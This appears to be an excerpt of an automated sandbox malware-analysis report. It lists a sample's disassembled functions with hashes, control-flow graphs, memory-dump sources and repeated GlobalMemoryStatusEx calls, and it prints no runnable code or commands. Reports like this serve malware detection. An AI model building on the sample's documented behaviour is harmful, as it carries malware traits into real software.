                                                                                                                • Opcode ID: 9b87e1f0081ca89dfff0da140871b25e0bf5e5df9078889f7e82ab436f17736e
                                                                                                                • Instruction ID: 9430970044b5224a9c12c246655217461080a0914b4116f12426152c687b188d
                                                                                                                • Opcode Fuzzy Hash: 9b87e1f0081ca89dfff0da140871b25e0bf5e5df9078889f7e82ab436f17736e
                                                                                                                • Instruction Fuzzy Hash: 1B110CB0A05248EFCB04CFACD4907ADBBF1EF49304F1480AAE856E7391D635AE41DB45
                                                                                                                Function 004013FF Relevance: .0, Instructions: 30COMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 31 4013ff-401452 call 401358 call 40108c call 4013b4
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000018.00000001.2336669270.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000018.00000001.2336669270.0000000000479000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000018.00000001.2336669270.000000000058C000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_24_1_400000_lxsyrsiW.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memset$EntryPointfopenstrcmpstrcpy
                                                                                                                • String ID:
                                                                                                                • API String ID: 4108700736-0
                                                                                                                • Opcode ID: 8a31f6e7c9d8c4b79f68c5e1b4c980db31f3675092d636c129533732d18511af
                                                                                                                • Instruction ID: 7b5742814f41c47d4244d2c3f0283e0289412fe64b87ae5b76c2526650b71fed
                                                                                                                • Opcode Fuzzy Hash: 8a31f6e7c9d8c4b79f68c5e1b4c980db31f3675092d636c129533732d18511af
                                                                                                                • Instruction Fuzzy Hash: 4BF074B5A04248AFCB40EFB9D981D8A77F8BB4C304B5044B6F948D7351E674EA448B58

                                                                                                                Execution Graph

                                                                                                                Execution Coverage:11.8%
                                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                                Signature Coverage:0%
                                                                                                                Total number of Nodes:122
                                                                                                                Total number of Limit Nodes:17
                                                                                                                execution_graph 23201 d70848 23202 d7084e 23201->23202 23203 d7091b 23202->23203 23206 d71487 23202->23206 23213 d7137f 23202->23213 23207 d71396 23206->23207 23208 d71484 23207->23208 23212 d71487 4 API calls 23207->23212 23220 d77d90 23207->23220 23224 d77c9c 23207->23224 23228 d77ea8 23207->23228 23208->23202 23212->23207 23214 d71383 23213->23214 23215 d7131a 23213->23215 23214->23215 23216 d71487 4 API calls 23214->23216 23217 d77d90 4 API calls 23214->23217 23218 d77c9c 4 API calls 23214->23218 23219 d77ea8 4 API calls 23214->23219 23215->23202 23216->23214 23217->23214 23218->23214 23219->23214 23221 d77da6 23220->23221 23222 d77e57 23221->23222 23233 d78718 23221->23233 23222->23207 23225 d77da6 23224->23225 23226 d77e57 23225->23226 23227 d78718 4 API calls 23225->23227 23226->23207 23227->23225 23229 d77eb2 23228->23229 23230 d77ecc 23229->23230 23335 66bfb58 23229->23335 23341 66bfb68 23229->23341 23230->23207 23234 d7871d 23233->23234 23235 d78f2d 23234->23235 23239 d7a04b 23234->23239 23244 d79fa8 23234->23244 23249 d79f98 23234->23249 23235->23221 23240 d7a020 23239->23240 23241 d7a061 23240->23241 23254 d7a098 23240->23254 23260 d7a0a8 23240->23260 23246 d79fc5 23244->23246 23245 d7a061 23246->23245 23247 d7a098 4 API calls 23246->23247 23248 d7a0a8 4 API calls 23246->23248 23247->23246 23248->23246 23251 d79fc5 23249->23251 23250 d7a061 23251->23250 23252 d7a098 4 API calls 23251->23252 23253 d7a0a8 4 API calls 23251->23253 23252->23251 23253->23251 23256 d7a0a8 23254->23256 23255 d7a182 23256->23255 23266 d7a4d6 23256->23266 23274 d7a2d8 23256->23274 23282 d7a1b2 23256->23282 23262 d7a0c2 23260->23262 23261 d7a182 23262->23261 23263 d7a4d6 4 API calls 23262->23263 23264 d7a1b2 4 API calls 23262->23264 23265 d7a2d8 4 API calls 23262->23265 23263->23262 23264->23262 23265->23262 23268 d7a1e1 23266->23268 23267 d7a505 23267->23256 23268->23267 23269 d7a4d6 4 API calls 23268->23269 23270 d7a1b2 4 API calls 23268->23270 23271 d7a2d8 4 API calls 23268->23271 23290 d7de38 23268->23290 23295 d7de28 23268->23295 23269->23268 23270->23268 23271->23268 23276 d7a1e1 23274->23276 23275 d7a505 23275->23256 23276->23275 23277 d7de38 4 API calls 23276->23277 23278 d7de28 4 API calls 23276->23278 23279 d7a4d6 4 API calls 23276->23279 23280 d7a1b2 4 API calls 23276->23280 23281 d7a2d8 4 API calls 23276->23281 23277->23276 23278->23276 23279->23276 23280->23276 23281->23276 23284 d7a1e1 23282->23284 23283 d7a505 23283->23256 23284->23283 23285 d7de38 4 API calls 23284->23285 23286 d7de28 4 API calls 23284->23286 23287 d7a4d6 4 API calls 23284->23287 23288 d7a1b2 4 API calls 23284->23288 23289 d7a2d8 4 API calls 23284->23289 23285->23284 23286->23284 23287->23284 23288->23284 23289->23284 23291 d7dea7 23290->23291 23292 d7de47 23290->23292 23291->23292 23301 d7eed0 23291->23301 23292->23268 23296 d7de33 23295->23296 23297 d7dcf9 23295->23297 23298 d7de47 23296->23298 23300 d7eed0 4 API calls 23296->23300 23297->23268 23298->23268 23299 d7e37e 23299->23268 23300->23299 23305 d7ef18 23301->23305 23316 d7ef08 23301->23316 23302 d7e37e 23302->23268 23306 d7ef25 23305->23306 23307 d7ef4d 23305->23307 23306->23302 23314 d7ef18 3 API calls 23307->23314 23315 d7ef08 3 API calls 23307->23315 23327 d7efe8 23307->23327 23330 d7efa8 23307->23330 23308 d7ef6e 23308->23302 23309 d7ef6a 23309->23308 23310 d7f036 GlobalMemoryStatusEx 23309->23310 23311 d7f066 23310->23311 23311->23302 23314->23309 23315->23309 23317 d7ef18 23316->23317 23318 d7ef25 23317->23318 23323 d7efe8 GlobalMemoryStatusEx 23317->23323 23324 d7efa8 GlobalMemoryStatusEx 23317->23324 23325 d7ef18 3 API calls 23317->23325 23326 d7ef08 3 API calls 23317->23326 23318->23302 23319 d7ef6e 23319->23302 23320 d7ef6a 23320->23319 23321 d7f036 GlobalMemoryStatusEx 23320->23321 23322 d7f066 23321->23322 23322->23302 23323->23320 23324->23320 23325->23320 23326->23320 23328 d7f036 GlobalMemoryStatusEx 23327->23328 23329 d7f066 23328->23329 23329->23309 23332 d7efc5 23330->23332 23331 d7efd3 23331->23309 23332->23331 23333 d7f036 GlobalMemoryStatusEx 23332->23333 23334 d7f066 23333->23334 23334->23309 23337 66bfb7d 23335->23337 23336 66bfd92 23336->23230 23337->23336 23338 d7e1e1 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 23337->23338 23339 d7de38 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 23337->23339 23340 d7de28 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 23337->23340 23338->23337 23339->23337 23340->23337 23343 66bfb7d 23341->23343 23342 66bfd92 23342->23230 23343->23342 23344 d7de28 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 23343->23344 23345 d7e1e1 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 23343->23345 23346 d7de38 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 23343->23346 23344->23343 23345->23343 23346->23343

                                                                                                                Executed Functions

                                                                                                                Function 066B2350 Relevance: 1.1, Instructions: 1055COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000019.00000002.2495719821.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_25_2_66b0000_neworigin.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 9bedf0b8937e330ba69f7485ed5be4a7988ec03783757ee8fa8d90febb46921d
                                                                                                                • Instruction ID: 34b24cba5341d1176bf875718e99514f6b90e347b1b20b537ce2f7f1d54bd7b4
                                                                                                                • Opcode Fuzzy Hash: 9bedf0b8937e330ba69f7485ed5be4a7988ec03783757ee8fa8d90febb46921d
                                                                                                                • Instruction Fuzzy Hash: AFA25430A00204CFDBA4DB68C594BADB7F6FB49314F5494A9D449AB361DB35EE86CF80
                                                                                                                Function 066B66E8 Relevance: .8, Instructions: 818COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000019.00000002.2495719821.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_25_2_66b0000_neworigin.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 9e9cfb63d1a6cee353562f184f78b0ac35e60b6dfdd2cd032ab17561ee4db9de
                                                                                                                • Instruction ID: 0491ad211a8fedd1e054cb885c5e8a2f92bdc112f824ff8b136fde577ab5425e
                                                                                                                • Opcode Fuzzy Hash: 9e9cfb63d1a6cee353562f184f78b0ac35e60b6dfdd2cd032ab17561ee4db9de
                                                                                                                • Instruction Fuzzy Hash: 0F629D30A00205CFDB54DB68D594AADB7F2FF88314F149469E80AEB355DB35ED86CB90
                                                                                                                Function 066BC2A0 Relevance: .6, Instructions: 635COMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 1339 66bc2a0-66bc2c0 1340 66bc2c2-66bc2c5 1339->1340 1341 66bc2d2-66bc2d5 1340->1341 1342 66bc2c7-66bc2cd 1340->1342 1343 66bc2dc-66bc2e5 1341->1343 1344 66bc2d7-66bc2da 1341->1344 1342->1341 1346 66bc2eb 1343->1346 1347 66bc500-66bc509 1343->1347 1344->1343 1345 66bc2f0-66bc2f3 1344->1345 1348 66bc2f5-66bc30f 1345->1348 1349 66bc314-66bc317 1345->1349 1346->1345 1350 66bc50f-66bc516 1347->1350 1351 66bc637-66bc66d 1347->1351 1348->1349 1352 66bc319-66bc31c 1349->1352 1353 66bc32e-66bc331 1349->1353 1354 66bc51b-66bc51e 1350->1354 1366 66bc66f-66bc672 1351->1366 1352->1351 1357 66bc322-66bc329 1352->1357 1360 66bc34a-66bc34d 1353->1360 1361 66bc333-66bc345 1353->1361 1358 66bc541-66bc544 1354->1358 1359 66bc520-66bc53c 1354->1359 1357->1353 1364 66bc54c-66bc54f 1358->1364 1365 66bc546-66bc547 1358->1365 1359->1358 1362 66bc37a-66bc37d 1360->1362 1363 66bc34f-66bc375 1360->1363 1361->1360 1371 66bc3df-66bc3e2 1362->1371 1372 66bc37f-66bc3da 1362->1372 1363->1362 1367 66bc551-66bc56b 1364->1367 1368 66bc570-66bc573 1364->1368 1365->1364 1369 66bc692-66bc695 1366->1369 1370 66bc674-66bc68d 1366->1370 1367->1368 1376 66bc57d-66bc580 1368->1376 1377 66bc575-66bc578 1368->1377 1380 66bc6ac-66bc6af 1369->1380 1381 66bc697-66bc6a5 1369->1381 1370->1369 1378 66bc40e-66bc411 1371->1378 1379 66bc3e4-66bc409 1371->1379 1372->1371 1386 66bc4a1-66bc4a4 1376->1386 1387 66bc586-66bc589 1376->1387 1377->1376 1382 66bc43e-66bc441 1378->1382 1383 66bc413-66bc439 1378->1383 1379->1378 1389 66bc6d2-66bc6d5 1380->1389 1390 66bc6b1-66bc6cd 1380->1390 1404 66bc6e7-66bc700 1381->1404 1405 66bc6a7 1381->1405 1400 66bc44e-66bc451 1382->1400 1401 66bc443-66bc449 1382->1401 1383->1382 1386->1352 1392 66bc4aa 1386->1392 1393 66bc58b-66bc5a5 1387->1393 1394 66bc5aa-66bc5ad 1387->1394 1398 66bc6e2-66bc6e5 1389->1398 1399 66bc6d7-66bc6e1 1389->1399 1390->1389 1403 66bc4af-66bc4b2 1392->1403 1393->1394 1406 66bc5af-66bc5b2 1394->1406 1407 66bc5b7-66bc5ba 1394->1407 1398->1404 1410 66bc70d-66bc70f 1398->1410 1411 66bc458-66bc45b 1400->1411 1412 66bc453-66bc455 1400->1412 1401->1400 1414 66bc4ce-66bc4d1 1403->1414 1415 66bc4b4-66bc4c3 1403->1415 1425 66bc71f-66bc72b 1404->1425 1456 66bc702-66bc70c 1404->1456 1405->1380 1406->1407 1418 66bc5db-66bc5de 1407->1418 1419 66bc5bc-66bc5d6 1407->1419 1423 66bc711 1410->1423 1424 66bc716-66bc719 1410->1424 1421 66bc45d-66bc482 1411->1421 1422 66bc487-66bc48a 1411->1422 1412->1411 1428 66bc4fb-66bc4fe 1414->1428 1429 66bc4d3-66bc4f6 1414->1429 1415->1365 1448 66bc4c9 1415->1448 1431 66bc5e8-66bc5eb 1418->1431 1432 66bc5e0-66bc5e5 1418->1432 1419->1418 1421->1422 1426 66bc49c-66bc49f 1422->1426 1427 66bc48c-66bc497 1422->1427 1423->1424 1424->1366 1424->1425 1436 66bc8cb-66bc8d5 1425->1436 1437 66bc731-66bc73a 1425->1437 1426->1386 1426->1403 1427->1426 1428->1347 1428->1354 1429->1428 1441 66bc5ff-66bc602 1431->1441 1442 66bc5ed-66bc5f4 1431->1442 1432->1431 1445 66bc740-66bc760 1437->1445 1446 66bc8d6-66bc90e 1437->1446 1452 66bc61a-66bc61c 1441->1452 1453 66bc604-66bc615 1441->1453 1442->1377 1451 66bc5fa 1442->1451 1472 66bc8b9-66bc8c5 1445->1472 1473 66bc766-66bc76f 1445->1473 1466 66bc910-66bc913 1446->1466 1448->1414 1451->1441 1457 66bc61e 1452->1457 1458 66bc623-66bc626 1452->1458 1453->1452 1457->1458 1458->1340 1464 66bc62c-66bc636 1458->1464 1470 66bc919-66bc927 1466->1470 1471 66bcacf-66bcad2 1466->1471 1478 66bc92e-66bc930 1470->1478 1474 66bcaf5-66bcaf7 1471->1474 1475 66bcad4-66bcaf0 1471->1475 1472->1436 1472->1437 1473->1446 1477 66bc775-66bc7a4 call 66b6698 1473->1477 1479 66bcaf9 1474->1479 1480 66bcafe-66bcb01 1474->1480 1475->1474 1496 66bc7e6-66bc7fc 1477->1496 1497 66bc7a6-66bc7de 1477->1497 1483 66bc932-66bc935 1478->1483 1484 66bc947-66bc971 1478->1484 1479->1480 1480->1466 1481 66bcb07-66bcb10 1480->1481 1483->1481 1491 66bc977-66bc980 1484->1491 1492 66bcac4-66bcace 1484->1492 1494 66bca9d-66bcac2 1491->1494 1495 66bc986-66bca95 call 66b6698 1491->1495 1494->1481 1495->1491 1546 66bca9b 1495->1546 1502 66bc81a-66bc830 1496->1502 1503 66bc7fe-66bc812 1496->1503 1497->1496 1509 66bc84e-66bc861 1502->1509 1510 66bc832-66bc846 1502->1510 1503->1502 1518 66bc86f 1509->1518 1519 66bc863-66bc86d 1509->1519 1510->1509 1520 66bc874-66bc876 1518->1520 1519->1520 1522 66bc878-66bc87d 1520->1522 1523 66bc8a7-66bc8b3 1520->1523 1524 66bc88b 1522->1524 1525 66bc87f-66bc889 1522->1525 1523->1472 1523->1473 1527 66bc890-66bc892 1524->1527 1525->1527 1527->1523 1528 66bc894-66bc8a0 1527->1528 1528->1523 1546->1492
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000019.00000002.2495719821.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_25_2_66b0000_neworigin.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 0027d9879a0da3e83b385098c34ea8fdb5bd79b2ccd737741c79d258e735079a
                                                                                                                • Instruction ID: 157ef6e46b82a1bcc611d739a73575193f5ee93d6a9b7fdfc5fdcf7f7e8d11e6
                                                                                                                • Opcode Fuzzy Hash: 0027d9879a0da3e83b385098c34ea8fdb5bd79b2ccd737741c79d258e735079a
                                                                                                                • Instruction Fuzzy Hash: DE327E34E00209DFDF54EB68D990BAEB7B2EB88314F109529D506EB755DB31ED82CB90
                                                                                                                Function 066B56B8 Relevance: .6, Instructions: 590COMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 1547 66b56b8-66b56d5 1548 66b56d7-66b56da 1547->1548 1549 66b56dc-66b56f2 1548->1549 1550 66b56f7-66b56fa 1548->1550 1549->1550 1551 66b56fc-66b570c 1550->1551 1552 66b5711-66b5714 1550->1552 1551->1552 1553 66b573a-66b573d 1552->1553 1554 66b5716-66b5735 1552->1554 1557 66b573f-66b5742 1553->1557 1558 66b5747-66b574a 1553->1558 1554->1553 1557->1558 1560 66b574c-66b5752 1558->1560 1561 66b5757-66b575a 1558->1561 1560->1561 1562 66b575c-66b575d 1561->1562 1563 66b5762-66b5765 1561->1563 1562->1563 1564 66b576c-66b576f 1563->1564 1565 66b5767-66b5769 1563->1565 1567 66b57ad-66b57b3 1564->1567 1568 66b5771-66b5774 1564->1568 1565->1564 1571 66b57b9 1567->1571 1572 66b5865-66b5873 1567->1572 1569 66b5782-66b5785 1568->1569 1570 66b5776-66b577d 1568->1570 1573 66b5787-66b578d 1569->1573 1574 66b5794-66b5797 1569->1574 1570->1569 1575 66b57be-66b57c1 1571->1575 1580 66b587a-66b587d 1572->1580 1576 66b578f 1573->1576 1577 66b57f4-66b57fa 1573->1577 1578 66b5799-66b579d 1574->1578 1579 66b57a8-66b57ab 1574->1579 1581 66b57d3-66b57d6 1575->1581 1582 66b57c3-66b57c8 1575->1582 1576->1574 1586 66b58a2-66b58cb 1577->1586 1587 66b5800-66b580b 1577->1587 1588 66b57a3 1578->1588 1589 66b5894-66b58a1 1578->1589 1579->1567 1579->1575 1590 66b5882-66b5884 1580->1590 1584 66b57d8-66b57ea 1581->1584 1585 66b57ef-66b57f2 1581->1585 1582->1557 1583 66b57ce 1582->1583 1583->1581 1584->1585 1585->1577 1591 66b582d-66b5830 1585->1591 1602 66b58d5-66b58d8 1586->1602 1587->1586 1592 66b5811-66b581e 1587->1592 1588->1579 1593 66b588b-66b588e 1590->1593 1594 66b5886 1590->1594 1598 66b5848-66b584b 1591->1598 1599 66b5832-66b5843 1591->1599 1592->1586 1597 66b5824-66b5828 1592->1597 1593->1548 1593->1589 1594->1593 1597->1591 1600 66b584d-66b5856 1598->1600 1601 66b5857-66b585a 1598->1601 1599->1598 1601->1573 1603 66b5860-66b5863 1601->1603 1605 66b58da-66b58e1 1602->1605 1606 66b58e2-66b58e5 1602->1606 1603->1572 1603->1590 1607 66b58f9-66b58fc 1606->1607 1608 66b58e7-66b58ee 1606->1608 1611 66b591e-66b5921 1607->1611 1612 66b58fe-66b5902 1607->1612 1609 66b59be-66b59c5 1608->1609 1610 66b58f4 1608->1610 1610->1607 1615 66b5943-66b5946 1611->1615 1616 66b5923-66b5927 1611->1616 1613 66b5908-66b5910 1612->1613 1614 66b59c6-66b5a03 1612->1614 1613->1614 1619 66b5916-66b5919 1613->1619 1627 66b5a05-66b5a08 1614->1627 1617 66b5948-66b594c 1615->1617 1618 66b5960-66b5963 1615->1618 1616->1614 1620 66b592d-66b5935 1616->1620 1617->1614 1621 66b594e-66b5956 1617->1621 1622 66b597b-66b597e 1618->1622 1623 66b5965-66b5976 1618->1623 1619->1611 1620->1614 1625 66b593b-66b593e 1620->1625 1621->1614 1626 66b5958-66b595b 1621->1626 1628 66b598f-66b5992 1622->1628 1629 66b5980-66b598a 1622->1629 1623->1622 1625->1615 1626->1618 1631 66b5a0a-66b5a1c 1627->1631 1632 66b5a27-66b5a2a 1627->1632 1633 66b59ac-66b59ae 1628->1633 1634 66b5994-66b5998 1628->1634 1629->1628 1647 66b5d6e-66b5d80 1631->1647 1648 66b5a22 1631->1648 1638 66b5a49-66b5a4c 1632->1638 1639 66b5a2c-66b5a3e 1632->1639 1635 66b59b0 1633->1635 1636 66b59b5-66b59b8 1633->1636 1634->1614 1640 66b599a-66b59a2 1634->1640 1635->1636 1636->1602 1636->1609 1641 66b5a4e-66b5a53 1638->1641 1642 66b5a56-66b5a59 1638->1642 1652 66b5d95-66b5d9a 1639->1652 1653 66b5a44 1639->1653 1640->1614 1644 66b59a4-66b59a7 1640->1644 1641->1642 1645 66b5a5b-66b5a6e 1642->1645 1646 66b5a71-66b5a74 1642->1646 1644->1633 1650 66b5a7a-66b5be6 1646->1650 1651 66b5d34-66b5d37 1646->1651 1647->1652 1663 66b5d82 1647->1663 1648->1632 1696 66b5d1e-66b5d31 1650->1696 1697 66b5bec-66b5bf3 1650->1697 1651->1650 1655 66b5d3d-66b5d40 1651->1655 1654 66b5d9d-66b5da0 1652->1654 1653->1638 1658 66b5dbb-66b5dbd 1654->1658 1659 66b5da2-66b5db4 1654->1659 1660 66b5d42-66b5d44 1655->1660 1661 66b5d47-66b5d4a 1655->1661 1667 66b5dbf 1658->1667 1668 66b5dc4-66b5dc7 1658->1668 1659->1652 1673 66b5db6 1659->1673 1660->1661 1665 66b5d69-66b5d6c 1661->1665 1666 66b5d4c-66b5d5e 1661->1666 1664 66b5d87-66b5d8a 1663->1664 1664->1650 1669 66b5d90-66b5d93 1664->1669 1665->1647 1665->1664 1666->1645 1675 66b5d64 1666->1675 1667->1668 1668->1627 1671 66b5dcd-66b5dd6 1668->1671 1669->1652 1669->1654 1673->1658 1675->1665 1698 66b5bf9-66b5c2b 1697->1698 1699 66b5ca6-66b5cad 1697->1699 1710 66b5c2d 1698->1710 1711 66b5c30-66b5c71 1698->1711 1699->1696 1701 66b5caf-66b5ce2 1699->1701 1712 66b5ce7-66b5d14 1701->1712 1713 66b5ce4 1701->1713 1710->1711 1721 66b5c89-66b5c90 1711->1721 1722 66b5c73-66b5c84 1711->1722 1712->1671 1713->1712 1724 66b5c98-66b5c9a 1721->1724 1722->1671 1724->1671
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000019.00000002.2495719821.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_25_2_66b0000_neworigin.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 373a991bc572fbc8c8c8d8b5ff29ae44b993ec29df9efae60a3c3c6aa8d376ee
                                                                                                                • Instruction ID: 66de2a99d6d51c4b86a77818314944ff85f284173a9b5aad02cb552b7f9964ba
                                                                                                                • Opcode Fuzzy Hash: 373a991bc572fbc8c8c8d8b5ff29ae44b993ec29df9efae60a3c3c6aa8d376ee
                                                                                                                • Instruction Fuzzy Hash: E222CF31F10255DBDB60DF64D8846EEB7B2EF85310F24942AD856AB385DB34EC82CB90
                                                                                                                Function 066B7E78 Relevance: .5, Instructions: 475COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000019.00000002.2495719821.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_25_2_66b0000_neworigin.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: f3386fc77ab90fccc454fa51b9b4fa560515ab7910afeb1582a3fab5b3452ae9
                                                                                                                • Instruction ID: 8a3f98140cf58824ccebfed313155257a6f078c5aeba7edd445cc0f68008392b
                                                                                                                • Opcode Fuzzy Hash: f3386fc77ab90fccc454fa51b9b4fa560515ab7910afeb1582a3fab5b3452ae9
                                                                                                                • Instruction Fuzzy Hash: FA028B30B01216CFDB54EF64D990AAEB7E6FF84304F249929D516DB385DB35EC828B90
                                                                                                                Function 00D7EF18 Relevance: 1.6, APIs: 1, Instructions: 130COMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 96 d7ef18-d7ef23 97 d7ef25-d7ef4c 96->97 98 d7ef4d-d7ef63 96->98 118 d7ef65 call d7efe8 98->118 119 d7ef65 call d7efa8 98->119 120 d7ef65 call d7ef18 98->120 121 d7ef65 call d7ef08 98->121 101 d7ef6a-d7ef6c 102 d7ef72-d7efd1 101->102 103 d7ef6e-d7ef71 101->103 110 d7efd7-d7f064 GlobalMemoryStatusEx 102->110 111 d7efd3-d7efd6 102->111 114 d7f066-d7f06c 110->114 115 d7f06d-d7f095 110->115 114->115 118->101 119->101 120->101 121->101
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000019.00000002.2433496043.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_25_2_d70000_neworigin.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 32a09be5069a7563a46ee2c1063318ab13482966799cc65da4181dfa4a41d2d2
                                                                                                                • Instruction ID: c758ae69941162c3407577888d8761ac4cc54771f2fc6e8789d4a8e327671b0e
                                                                                                                • Opcode Fuzzy Hash: 32a09be5069a7563a46ee2c1063318ab13482966799cc65da4181dfa4a41d2d2
                                                                                                                • Instruction Fuzzy Hash: 60410072D0035A9FDB14DFA9D8407EEBBF5EF89310F18856AD518A7240EB789845CBA0
                                                                                                                Function 00D7EFE8 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 122 d7efe8-d7f064 GlobalMemoryStatusEx 124 d7f066-d7f06c 122->124 125 d7f06d-d7f095 122->125 124->125
                                                                                                                APIs
                                                                                                                • GlobalMemoryStatusEx.KERNELBASE ref: 00D7F057
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000019.00000002.2433496043.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_25_2_d70000_neworigin.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: GlobalMemoryStatus
                                                                                                                • String ID:
                                                                                                                • API String ID: 1890195054-0
                                                                                                                • Opcode ID: 82d0576193ed7c3fe2862dba73604e3eaf79fb7e9ffb37f75954ed089f71e962
                                                                                                                • Instruction ID: b60a75d94db6f4cca827d7eee1be663e7817fd50cfa402cb3e7fe53226a68cea
                                                                                                                • Opcode Fuzzy Hash: 82d0576193ed7c3fe2862dba73604e3eaf79fb7e9ffb37f75954ed089f71e962
                                                                                                                • Instruction Fuzzy Hash: 1E1114B1C0065ADFDB20DFAAC445BDEFBB4AF48310F15816AE818B7240D778A950CFA5
                                                                                                                Function 066BB760 Relevance: .5, Instructions: 474COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000019.00000002.2495719821.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_25_2_66b0000_neworigin.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: ba277eae3dccbe8946dec09c44acddf18a1c883b0f0b01403ef1b0b905f802be
                                                                                                                • Instruction ID: 477462eb82cdd9ccd12763c6e50b3c234fafb725235348af794512f98d38fb5a
                                                                                                                • Opcode Fuzzy Hash: ba277eae3dccbe8946dec09c44acddf18a1c883b0f0b01403ef1b0b905f802be
                                                                                                                • Instruction Fuzzy Hash: 6C023830E0020ACFDBA4DF68D580AADB7B2FB85310F20992AD415DB355DF75E986CB91
                                                                                                                Function 066B9250 Relevance: .2, Instructions: 230COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000019.00000002.2495719821.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_25_2_66b0000_neworigin.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 6960cd1c228d143b0995d0b748c70476bc4c5e09d808e74ee1553e47657b114e
                                                                                                                • Instruction ID: 34604d05f5c9f2c1ee7e6e2dd16ccaad4f38df8ca9e0301b74b60fc9759bbbfe
                                                                                                                • Opcode Fuzzy Hash: 6960cd1c228d143b0995d0b748c70476bc4c5e09d808e74ee1553e47657b114e
                                                                                                                • Instruction Fuzzy Hash: 30914F30F1025ACFDB94DB64D9507AEB3F6AF85300F108669C90AEB744EF709D868B95
                                                                                                                Function 066B62E8 Relevance: .2, Instructions: 229COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000019.00000002.2495719821.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
